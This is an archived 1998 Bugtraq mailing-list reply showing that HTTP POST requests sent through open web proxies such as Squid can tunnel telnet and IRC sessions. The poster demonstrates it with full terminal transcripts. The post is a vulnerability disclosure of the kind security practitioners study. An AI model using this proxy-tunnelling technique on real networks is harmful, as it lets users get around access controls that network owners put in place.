Bugtraq mailing list archives
Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering
From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Tue, 13 Oct 1998 23:08:44 +0200
On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
Date: Thu, 08 Oct 1998 08:27:36 +0100 From: "Mnemonix" <mnemonix () globalnet co uk> Firstly it seems that most web-based proxies, not just MS Proxy, are susceptible to this kind of attack. Thanks to Greg Jones and others for doing some testing on this.HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will pass them straightforward.
Very untrue. Look at this: [hardbeat@haarlem hardbeat]$ telnet proxy 8080 Trying 194.178.232.18... Connected to rotterdam.vuurwerk.nl. Escape character is '^]'. POST http://telnet:23/ HTTP/1.0 VuurWerk Internet Telnet Server (telnet.vuurwerk.nl) Alle transacties worden gelogged, het gebruik van deze server is alleen voor klanten van VuurWerk tbv. het onderhoud van hun eigen site. POST / HTTP/1.0 Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21) X-Forwarded-For: 194.178.232.22 Host: telnet.vuurwerk.nl Cache-control: Max-age=259200 login: hardbeat Password: Last login: Tue Oct 13 22:59:49 from rotterdam PID TTY STAT TIME COMMAND 5896 p6 S 0:00 /bin/login -h p8ur.cistron.nl -p 5901 p6 S 0:00 \_ -bash 6175 p6 S 0:00 \_ telnet proxy 8080 6186 p8 S 0:00 /bin/login -h rotterdam vuurwerk.nl -p 6190 p8 S 0:00 \_ -bash 6205 p8 R 0:00 \_ ps xfww [hardbeat@haarlem hardbeat]$ Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21) will happily forward me, and telnet works as if there's no proxy inbetween. Another great example: [hardbeat@haarlem hardbeat]$ telnet proxy 8080 Trying 194.178.232.18... Connected to rotterdam.vuurwerk.nl. Escape character is '^]'. POST http://irc.pi.net:6667/ HTTP/1.0 nick Hardbeat2 PING:1693634679 PONG 1693634679 USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy) :Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2 :Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04 :Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST I can happily IRC now... imagine how easy it would be to write an IRC bouncer that uses a proxy. Lots of proxies have NO acl or firewall around them. The only thing I have _not_ succeeded in until now is chaining proxies with GET or POST requests. Greetz, Peter. -- 'I guess anybody who walks away from a root shell at : Peter van Dijk a nerd party gets what they deserve!' -- BillSF :peter () attic vuurwerk nl -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- finger peter () jamaica xs4all nl for my public PGP-key - --- - --- - --- - --- - --- - --- - --- - --- - --- -
Current thread:
- By-passing MS Proxy 2.0 and others packet filtering Mnemonix (Oct 08)
- Lotus Domino application vulnerability Weld Pond (Oct 08)
- Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Jean-Christophe Touvet (Oct 08)
- Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Gus (Oct 13)
- Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Peter van Dijk (Oct 13)
- Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering Kevin Way (Oct 14)
- Secure Locate v1.2 klindsay (Oct 14)
- Re: By-passing MS Proxy 2.0 and others packet filtering Marc D. Behr (Oct 09)
- DoS attack in MS - Proxy 2.0 Mnemonix (Oct 09)